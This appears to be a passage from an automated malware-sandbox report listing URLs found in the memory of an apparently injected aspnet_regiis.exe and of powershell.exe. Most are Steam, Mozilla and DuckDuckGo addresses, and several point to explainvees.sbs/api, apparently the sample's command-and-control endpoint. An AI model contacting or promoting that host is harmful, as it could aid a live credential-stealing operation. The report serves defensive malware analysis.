                Source: aspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1508014312.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1507674483.0000000002903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                Source: aspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1508014312.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=2ido
                Source: aspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1508014312.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1507674483.0000000002903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&l=englis
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&l=
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&l=engli
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=qxcQfFI1hKQa&amp
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
                Source: aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                Source: aspnet_regiis.exe, 00000007.00000003.1648458748.00000000056A7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1619768349.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
                Source: aspnet_regiis.exe, 00000008.00000003.1619768349.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: powershell.exe, 00000024.00000002.1940781262.00000000062E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000024.00000002.1940781262.00000000062E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000024.00000002.1940781262.00000000062E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: aspnet_regiis.exe, 00000007.00000003.1527742549.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527594236.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527538113.00000000056D9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530696295.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530776649.0000000004D96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530957968.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: aspnet_regiis.exe, 00000007.00000003.1527742549.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527594236.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527538113.00000000056D9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530696295.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530776649.0000000004D96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530957968.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: aspnet_regiis.exe, 00000007.00000003.1527742549.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527594236.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527538113.00000000056D9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530696295.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530776649.0000000004D96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530957968.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explainvees.sbs/api
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1463623078.0000000002E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explainvees.sbs/pi
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1463623078.0000000002E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explainvees.sbs/pib
                Source: powershell.exe, 00000024.00000002.1936687043.00000000053D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
